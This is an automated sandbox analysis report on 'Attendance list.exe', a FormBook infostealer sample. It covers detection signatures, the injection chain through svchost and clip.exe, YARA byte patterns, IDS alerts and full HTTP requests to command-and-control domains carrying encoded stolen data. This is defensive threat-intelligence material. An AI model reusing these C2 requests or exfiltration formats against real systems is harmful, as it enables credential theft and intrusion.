Windows Analysis Report
Attendance list.exe

Overview

General Information

Sample name:Attendance list.exe
Analysis ID:1465846
MD5:8a08778411f99d8db7790cb7f0a84e3b
SHA1:374833b2a846feb5c015f0ffcf44320a62ffa697
SHA256:fd8e19c88440f8e813686b5b91c2df082c0d319af7ff6a10056e27c5400228fe
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Attendance list.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\Attendance list.exe" MD5: 8A08778411F99D8DB7790CB7F0A84E3B)
    • svchost.exe (PID: 7136 cmdline: "C:\Users\user\Desktop\Attendance list.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sSzWYtHqcRqHklFYcPzKpLlSXP.exe (PID: 6600 cmdline: "C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 1488 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • firefox.exe (PID: 2944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Attendance list.exe", CommandLine: "C:\Users\user\Desktop\Attendance list.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ParentImage: C:\Users\user\Desktop\Attendance list.exe, ParentProcessId: 5496, ParentProcessName: Attendance list.exe, ProcessCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ProcessId: 7136, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Attendance list.exe", CommandLine: "C:\Users\user\Desktop\Attendance list.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ParentImage: C:\Users\user\Desktop\Attendance list.exe, ParentProcessId: 5496, ParentProcessName: Attendance list.exe, ProcessCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ProcessId: 7136, ProcessName: svchost.exe

            AV Detection

            Source: http://www.sandranoll.com/aroo/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ==Avira URL Cloud: Label: malware
            Source: http://www.sandranoll.com/aroo/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4RAvira URL Cloud: Label: malware
            Source: www.sandranoll.comVirustotal: Detection: 8%
            Source: www.anuts.topVirustotal: Detection: 8%
            Source: Attendance list.exeReversingLabs: Detection: 50%
            Source: Attendance list.exeVirustotal: Detection: 39%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Attendance list.exeJoe Sandbox ML: detected
            Source: Attendance list.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093430557.000000000012E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00924696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00924696
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092C9C7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C93C FindFirstFileW,FindClose,0_2_0092C93C
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F200
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F35D
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092F65E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923A2B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923D4E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265BC20 FindFirstFileW,FindNextFileW,FindClose,4_2_0265BC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax4_2_02649870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h4_2_043D053E

            Networking

            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49712 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49713 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49717 -> 142.250.181.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49718 -> 142.250.181.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49721 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49722 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49725 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49726 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49729 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49730 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49733 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49734 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49737 -> 199.192.19.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49738 -> 199.192.19.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49741 -> 213.145.228.16:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49742 -> 213.145.228.16:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49745 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49746 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49749 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49750 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49753 -> 172.67.210.102:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49754 -> 172.67.210.102:80
            Source: Joe Sandbox ViewIP Address: 23.251.54.212 23.251.54.212
            Source: Joe Sandbox ViewIP Address: 213.145.228.16 213.145.228.16
            Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
            Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: DOMAINTECHNIKAT DOMAINTECHNIKAT
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009325E2
            Source: global trafficHTTP traffic detected: GET /w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?66s0QHx=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hatercoin.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /li0t/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /ei85/?66s0QHx=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.telwisey.info
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /aroo/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ== HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.sandranoll.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /tf44/?66s0QHx=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.gipsytroya.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /mooq/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ== HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.helpers-lion.online
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic; HTTP traffic detected: GET /lfkn/?66s0QHx=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT4CuBs9Ly3z32vNrKxrasIe0t0HCtUE4LbxPxJKDUCSn2XA==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.dmtxwuatbz.cc
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: unknown; HTTP traffic detected: POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 208
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: 66s0QHx=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR73IkHfOzQRQWHvrDRtTxYyT1e+F3QUiqZoLa+n8=
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Tue, 02 Jul 2024 05:15:38 GMT
                Server: Apache
